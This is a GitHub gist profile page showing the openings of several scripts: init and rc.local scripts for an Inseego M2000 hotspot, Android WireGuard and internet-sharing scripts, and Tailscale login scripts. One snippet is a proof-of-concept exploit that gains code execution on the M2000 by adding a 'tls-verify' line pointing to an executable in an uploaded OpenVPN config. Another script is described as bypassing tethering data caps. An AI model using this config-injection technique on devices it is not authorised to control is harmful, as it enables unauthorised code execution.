Skip to content

Instantly share code, notes, and snippets.

View Geofferey's full-sized avatar
🤓
OnePlus 8T time

Geofferey Eakins Geofferey

🤓
OnePlus 8T time
  • NETLABWORK
  • USA
View GitHub Profile
@Geofferey
Geofferey / inseego-m2000_rc.local
Last active May 6, 2025 20:56
inseego-m2000_rc.local
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/opt/nvtl/bin:/opt/nvtl/data/branding/bin
# Place in /etc/rc.local
for script in /etc/rc.local.d/*; do
if [ -x $script ]; then
@Geofferey
Geofferey / inseego_m2000-init-rc_local.sh
Last active May 6, 2025 20:25
inseego_m2000-init-rc_local.sh
#!/bin/sh
# INIT script for starting rc.local > rc.local.d
# Placed in /etc/init.d/rc_local.sh
#set -x
case "$1" in
start)
echo -n "Starting rc.local: "
/bin/sh /etc/rc.local
echo "done"
@Geofferey
Geofferey / inseego_m2000-stage2-exploit.ovpn
Last active May 6, 2025 22:15
inseego_m2000-stage2-exploit.ovpn
client
dev tun
persist-tun
persist-key
ncp-ciphers AES-128-GCM:AES-256-GCM
cipher AES-128-GCM
auth SHA1
tls-client
resolv-retry infinite
remote some-server.internal 1196
client
dev tun
persist-tun
persist-key
ncp-ciphers AES-128-GCM:AES-256-GCM
cipher AES-128-GCM
auth SHA1
tls-client
resolv-retry infinite
remote some-server.internal 1196
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/opt/nvtl/bin:/opt/nvtl/data/branding/bin
## PoC Exploit payload for the Open VPN implementation RCE on Inseego M2000 (Novatel)
# Append the following to .opvn to be uploaded to the Inseego m2000, full paths must be used
#
# tls-verify "/path/to/bin/executable"
#
# ^ That's 5 spaces or a <TAB> ^
@Geofferey
Geofferey / and-wireguard.sh
Created April 29, 2025 00:29
A script to setup wireguard tunnel on Android
#!/system/bin/sh
if [ -z ${INTERACTIVE} ]; then
until [[ $(getprop sys.boot_completed) = 1 ]] && [[ $(getprop dev.bootcomplete) = 1 ]] && [[ $(getprop service.bootanim.exit) = 1 ]] && [[ $(getprop init.svc.bootanim) = stopped ]]; do
sleep 5
done
@Geofferey
Geofferey / and-sharenet.sh
Created April 28, 2025 11:20
Script for sharing internet on Android and bypassing tethering data capa
#!/system/bin/sh
PATH=$PATH:/system/bin:/system/xbin:/vendor/bin:/vendor/xbin
TUN_INTF=tun_vpn0
WLAN_INTF=wlan0
AP_INTF=wlan1
ETH_INTF=eth0
RMNET_INTFS=rmnet_data+
WG_INTF=tun_vpn0
@Geofferey
Geofferey / tailscale-debugging.ps1
Created December 18, 2024 12:50
A custom script for debugging tailscale when running in unattended mode without GUI (WIP)
$host.ui.RawUI.WindowTitle = "NTAUTHORITY\SYSTEM - Tailscale Debugging"
$ErrorActionPreference = "Continue"
$host.ui.RawUI.BackgroundColor = "Black"
$host.ui.RawUI.ForegroundColor = "Red"
$RootPath = $PWD.Path
cd ".\"
$UserName = (whoami)
@Geofferey
Geofferey / tailscale-ad-login.ps1
Last active December 18, 2024 12:45
A Script for logging into Tailscale via preauth key stored in Active Direcotry
## I am a custom Script for logging TailScale in on boot using tsPreAuthKey attribute stored in AD Schema
# This requires permanent modification to the schema for storing the PreAuthKey:
# https://www.rebeladmin.com/step-step-guide-create-custom-active-directory-attributes/
# https://legacy.support.exclaimer.com/hc/en-gb/articles/360028648572-How-to-create-new-custom-AD-attributes-for-use-in-a-signature-template
# Do NOT issue re-useable PreAuthTokens and store in AD, that would be foolish, storing them period might be ;))
# Execute me as a Computer policy based powershell startup script
# Schduled task is also an option, may not work on first run
#
$env:Path = 'C:\Program Files\Tailscale;' + $env:Path
@Geofferey
Geofferey / tailscale-preauth.ps1
Created December 18, 2024 12:39
A script that gets executed by a custom installer for tailscale
## I am a custom Script for logging TailScale in on boot using tsPreAuthKey attribute stored in AD Schema
# Now I double as an executable via ps12exe that gets installed via an inno setup wizard
# This requires permanent modification to the schema for storing the PreAuthKey:
# https://www.rebeladmin.com/step-step-guide-create-custom-active-directory-attributes/
# https://legacy.support.exclaimer.com/hc/en-gb/articles/360028648572-How-to-create-new-custom-AD-attributes-for-use-in-a-signature-template
# Do NOT issue re-useable PreAuthTokens and store in AD, that would be foolish, storing them period might be ;))
# Execute me as a Computer policy based powershell startup script
# Schduled task is also an option, may not work on first run
#
$ErrorActionPreference = "SilentlyContinue"